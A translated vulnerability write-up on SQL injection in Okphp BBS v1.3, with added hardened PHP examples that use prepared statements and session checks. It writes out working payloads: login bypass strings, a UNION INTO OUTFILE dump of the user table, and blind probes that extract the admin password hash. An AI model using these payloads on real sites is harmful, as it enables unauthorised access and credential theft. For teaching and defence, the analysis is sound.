I. Preface:
Version: Okphp BBS v1.3 open-source edition
Because of the characteristics of PHP and MySQL, PHP + MySQL injection is harder than ASP injection, especially when it comes to constructing the statements. This article analyzes several files in Okphp BBS v1.3 to discuss how PHP + MySQL injection statements are constructed. I hope this article will be helpful to you.
Disclaimer: none of the "vulnerabilities" mentioned in this article have been tested, and they may not exist at all. In fact, whether they exist is not important; what matters is the line of analysis and the construction of the statements.
II. vulnerability analysis:
1. Authentication bypass vulnerability caused by injection in admin/login.php:
Code:
$conn = sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);
The statement in question:
$q = "select id,group_id from $user_table where username='$username' and password='$password'"
$username and $password are not filtered, so the check can be easily bypassed.
For statements such as select * from $user_table where username='$username' and password='$password', the ways to transform them include:
Construct 1 (using logical operators): $username = ' OR 'a'='a   $password = ' OR 'a'='a
Equivalent to the SQL statement:
select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
Construct 2 (using the MySQL comment markers # or /* to comment out $password): $username = admin'# (or admin'/*)
That is:
select * from $user_table where username='admin'#' and password='$password'
Equivalent to:
select * from $user_table where username='admin'
In admin/login.php, $password in the $q statement is hashed with MD5 before the query, so it cannot be bypassed with the statement in Construct 1. Here we use Construct 2:
select id,group_id from $user_table where username='admin'#' and password='$password'
Equivalent to:
select id,group_id from $user_table where username='admin'
If you do not know the user name and only know the corresponding id, we can construct it like this: $username = ' OR id=1 #
Equivalent to:
select id,group_id from $user_table where username='' OR id=1 #' and password='$password' (everything after # is commented out)
Let's look at the code that follows:
if ($row[0]) {
    // If not admin or super moderator
    if ($username != "admin" && !eregi("(^|&)3($|&)", $row[1])) {
        $login = 0;
    }
    else {
        $login = 1;
    }
}
// Fail to login ---------------
if (!$login) {
    write_log("Moderator login", "0", "password wrong");
    echo "";
    exit();
}
// Access! -------------
else {
    session_start();
In the end, the decision rests on $login alone, so we only need to submit $login=1 from IE to bypass it :).
2. Authentication bypass vulnerability caused by injection in users/login.php:
Code:
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);
$username is not filtered. The and password='$md5password' part can be commented out in the same way as in vulnerability 1.
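A hardened counterpart to the two login.php queries, as an added example that is not Okphp's own code: the username is bound as a parameter and $login is set only inside the function. The helper name check_login, the in-memory SQLite database (standing in for MySQL so the script runs offline) and the two accounts are assumptions made for illustration.

```php
<?php
// Added example, not Okphp code. Table and column names follow the excerpt;
// the in-memory SQLite database and both accounts are constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE user_table
    (id INTEGER PRIMARY KEY, group_id TEXT, username TEXT, password TEXT)');
$ins = $pdo->prepare(
    'INSERT INTO user_table (group_id, username, password) VALUES (?, ?, ?)');
$ins->execute(['3', 'admin', md5('correct horse')]);
$ins->execute(['1', 'guest', md5('guest-pass')]);

// Hypothetical helper: returns 1 for an admin or group-3 login, otherwise 0.
function check_login(PDO $pdo, string $username, string $password): int
{
    $login = 0; // initialised on every path, never read from the request

    // The placeholder keeps $username as data: quotes, # and /* cannot
    // change the statement, so the password test below always runs.
    $stmt = $pdo->prepare(
        'SELECT id, group_id, password FROM user_table WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Stored value is md5(password), as in the excerpt; compare it in
    // constant time. (password_hash()/password_verify() would be the
    // stronger storage scheme.)
    if ($row && hash_equals($row['password'], md5($password))) {
        // explode() replaces the excerpt's eregi() test for group 3
        // (eregi() was removed in PHP 7).
        $groups = explode('&', $row['group_id']);
        if ($username === 'admin' || in_array('3', $groups, true)) {
            $login = 1;
        }
    }
    return $login;
}

// Constructed inputs: one valid login, then the username forms from the text.
$tries = [
    ['admin', 'correct horse'],
    ["admin'#", 'anything'],
    ["' OR id=1 #", 'anything'],
    ["admin' and length(password)=6 #", 'anything'],
    ['guest', 'guest-pass'],
];
foreach ($tries as [$u, $p]) {
    printf("%-34s login=%d\n", $u, check_login($pdo, $u, $p));
}
```

Because the bound username never reaches the SQL parser as syntax, the length() probe in the fourth input also returns the same result whether or not its condition would have been true.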
3. Arbitrary log deletion vulnerability in admin\log\list.php. (PS: this does not really have anything to do with PHP + MySQL injection; it is just mentioned in passing.)
The Okphp admin back end seems very sloppy: none of the files check whether the administrator is logged in, so they can be accessed at will. Let's look at the code of list.php:
$arr = array("del_log", "log_id", "del_id");
get_r($arr);
//
if ($del_log) {
    // omitted ........
    if ($log_id) {
        foreach ($log_id as $val) {
            $q = "delete from $log_table where id='$val'";
            $res = sql_query($q, $conn);
            if ($res) {
                $i++;
            }
        }
    }
    elseif ($del_id) {
        $q = "delete from $log_table where id='$del_id'";
        $res = sql_query($q, $conn);
    }
    $tpl->setVariable("message", "$i log deleted OK!");
    $tpl->setVariable("action", "index.php?action=list_log");
}
The code only uses get_r($arr); to take in the submitted parameters, so we only need to submit the corresponding $del_log, $log_id and $del_id, and the deletion succeeds.
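What the missing checks in list.php would look like, as an added example that is not Okphp's own code: the deletion is gated on server-side session state and every id is validated and bound. The function name delete_logs, the session key is_admin and the SQLite log_table with its four rows are assumptions made for illustration.

```php
<?php
// Added example, not Okphp code. $session['is_admin'] is a hypothetical flag
// that the login page would set; log_table and its rows are constructed.
function delete_logs(PDO $pdo, array $session, array $request): int
{
    // 1. Authorisation comes from server-side session state, not from
    //    which parameters the request carries.
    if (empty($session['is_admin'])) {
        return -1; // caller answers 403 and deletes nothing
    }
    // 2. Accept log_id[] or a single del_id, as the excerpt does.
    $raw = [];
    if (isset($request['log_id']) && is_array($request['log_id'])) {
        $raw = $request['log_id'];
    } elseif (isset($request['del_id'])) {
        $raw = [$request['del_id']];
    }
    // 3. Keep only positive integers; anything else is dropped.
    $ids = [];
    foreach ($raw as $val) {
        $id = filter_var($val, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 1]]);
        if ($id !== false) {
            $ids[] = $id;
        }
    }
    // 4. Bind each id instead of interpolating it into the statement.
    $stmt = $pdo->prepare('DELETE FROM log_table WHERE id = ?');
    $deleted = 0;
    foreach ($ids as $id) {
        $stmt->execute([$id]);
        $deleted += $stmt->rowCount();
    }
    return $deleted;
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE log_table (id INTEGER PRIMARY KEY, msg TEXT)');
$pdo->exec("INSERT INTO log_table (msg) VALUES ('a'), ('b'), ('c'), ('d')");

// Constructed requests: no session, then an admin session with mixed ids.
$req = ['del_log' => '1', 'log_id' => ['1', "2' or '1'='1", '3']];
printf("anonymous: %d\n", delete_logs($pdo, [], $req));
printf("admin:     %d\n", delete_logs($pdo, ['is_admin' => true], $req));
printf("rows left: %d\n",
    $pdo->query('SELECT COUNT(*) FROM log_table')->fetchColumn());
```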
4. SQL injection vulnerabilities caused by unfiltered variables in multiple files.
The Okphp authors do not seem to like filtering :). Basically all the variables in the SQL statements are "naked". I will not list the specific files; please read the code yourself. Here I use \forums\list_threads.php as an example for a brief discussion.
Check the code of list_threads.php:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'";
$res = sql_query($q, $conn);
$row = sql_fetch_row($res);
The variable $forum_id is not filtered. Because MySQL does not support subqueries, we can use union to build a joint query (MySQL version 4.00 or later is required) and operate across databases. We construct the following:
Construct 1: SELECT * FROM table into outfile '/path/file.txt' (the MySQL account must have the FILE privilege; note that on Windows an absolute path is required, for example c://path//file.txt). This writes the query result into file.txt, which can then be read through http://ip/path/file.txt. We can construct $forum_id as follows:
$forum_id = ' union select * from user_table into outfile '/path/file.txt'
The statement becomes:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'";
The method above has strict requirements: the web path must be known (it can be obtained by submitting an invalid variable so that MySQL reports an error), and PHP's magic_quotes_gpc=on option blocks the single quotes used in the injection. If magic_quotes_gpc=on, there is still a way around it:
Construct 2: as with cross-database queries in ASP, the union select statement is used directly, and different statements are constructed according to the different results returned. This method gets around the single-quote restriction (magic_quotes_gpc=on) so that injection can continue, but in PHP this kind of injection is relatively difficult and depends on the specific code. For the specific statement construction, see pinkeyes's article "php injection instance". An example of using Okphp with the "different returned results" approach follows (see vulnerability 5).
5. admin/login.php and users/login.php: using SQL statement construction to guess the hash of a specified user's password (in fact this is the same issue as vulnerability 1 and vulnerability 2; it is listed separately here mainly to illustrate how the statement is constructed).
The problem code is the same as in vulnerability 1.
Statement construction (PS: because the statement itself already operates on the user database, there is no need to use union):
$username = admin' and length(password)=6 #
The SQL statement becomes:
$q = "select id,group_id from $user_table where username='admin' and length(password)=6 #' and password='$password'"
Equivalent to:
$q = "select id,group_id from $user_table where username='admin' and length(password)=6"
If length(password)=6 is true, the system returns a normal result; if it is not true, MySQL reports an error.
In this way, we can guess the password hash of the user admin. For example, $username = admin' and ord(substring(password,1,1))=57 #
This lets you guess the ASCII value of the first character of the password .............